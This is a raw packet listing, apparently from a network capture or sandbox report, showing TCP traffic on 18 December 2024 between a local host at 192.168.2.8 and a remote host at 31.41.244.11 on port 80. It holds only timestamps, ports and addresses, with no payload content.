Dec 18, 2024 13:38:36.683355093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.683413029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.683490992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.683541059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.684463978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.684516907 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.684533119 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.684586048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.685503006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.685560942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.685575962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.685632944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.686534882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.686590910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.686650038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.686697006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.687622070 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.687673092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.687707901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.687757015 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.688780069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.688838005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.688874960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.688925982 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.689754963 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.689810991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.689894915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.689941883 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.690789938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.690841913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.690907955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.690957069 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.691900015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.691920996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.691955090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.691977978 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.692867041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.692926884 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.693099976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.693156004 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.694060087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.694118023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.694127083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.694174051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.695063114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.695120096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.695185900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.695239067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.696152925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.696188927 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.696209908 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.696253061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.697221994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.697277069 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.697287083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.697335005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.698246002 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.698301077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.698337078 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.698385000 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.699590921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.699649096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.699676991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.699722052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.700479984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.700535059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.700648069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.700700045 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.701404095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.701455116 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.701587915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.701636076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.702574015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.702594042 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.702620029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.702644110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.703560114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.703618050 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.703639984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.703687906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.704606056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.704668045 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.704690933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.704739094 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.705671072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.705723047 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.705862999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.705924988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.706742048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.706793070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.706845999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.706895113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.707755089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.707808018 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.707925081 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.707976103 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.708818913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.708872080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.708920956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.708967924 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.710006952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.710027933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.710059881 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.710093021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.711002111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.711055040 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.711078882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.711128950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.712194920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.712290049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.712409973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.712451935 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.713126898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.713181973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.713203907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.713249922 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.714143038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.714195013 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.714237928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.714287043 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.715209961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.715262890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.715282917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.715332031 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.716279030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.716335058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.716363907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.716411114 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.717328072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.717381001 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.717498064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.717545033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.718389034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.718441010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.718523026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.718570948 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.719474077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.719541073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.719552040 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.719587088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.720566034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.720628977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.730110884 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.730179071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.730200052 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.730246067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.730258942 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.730309010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.730422020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.730468035 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.731358051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.731410980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.731446981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.731497049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.732352972 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.732408047 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.732475042 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.732522011 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.733516932 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.733565092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.733578920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.733627081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.734474897 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.734535933 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.734626055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.734677076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.735599995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.735649109 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.735763073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.735815048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.736598015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.736649990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.864104986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.864124060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.864253044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.864522934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.864581108 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.864610910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.864679098 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.865571976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.865632057 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.865677118 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.865734100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.866578102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.866635084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.866991997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.867011070 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.867057085 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.867079020 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.868009090 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.868073940 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.868177891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.868231058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.869023085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.869075060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.869198084 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.869250059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.870130062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.870184898 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.870277882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.870327950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.871264935 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.871326923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.871417999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.871469021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.872252941 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.872311115 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.872459888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.872514009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.873287916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.873353004 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.873414040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.873461008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.874319077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.874377012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.874444962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.874490976 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.875435114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.875494003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.875544071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.875592947 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.876492023 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.876544952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.876600981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.876650095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.877604961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.877618074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.877667904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.878608942 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.878669977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.878741980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.878792048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.879643917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.879698992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.879725933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.879772902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.880775928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.880831003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.880887985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.880943060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.881767988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.881824970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.881927013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.881980896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.882837057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.882898092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.882951021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.883002996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.883887053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.883944988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.884110928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.884218931 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.885144949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.885165930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.885205984 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.885225058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.886034012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.886136055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.886163950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.886219978 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.887096882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.887155056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.887202978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.887250900 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.888187885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.888253927 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.888256073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.888305902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.889451981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.889466047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.889518023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.890322924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.890382051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.890413046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.890467882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.891644955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.891663074 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.891726017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.892715931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.892786026 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.892808914 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.892863035 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.893572092 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.893620014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.893630981 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.893677950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.894625902 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.894689083 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.894689083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.894742012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.895622015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.895682096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.895764112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.895813942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.896658897 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.896727085 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.896739960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.896799088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.897756100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.897816896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.897826910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.897866011 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.898783922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.898855925 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.898895979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.898972034 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.899817944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.899907112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.899972916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.900898933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.900985956 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.901043892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.901098967 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.902158976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.902226925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.902228117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.902273893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.902980089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.903039932 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.903105021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.903160095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.904181004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.904197931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.904253006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.905225992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.905251980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.905289888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.905319929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.906202078 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.906261921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.906445980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.906498909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.907341003 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.907402039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.907627106 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.907741070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.908293962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.908350945 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.908433914 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.908480883 CET	49715	80	192.168.2.8	31.41.244.11
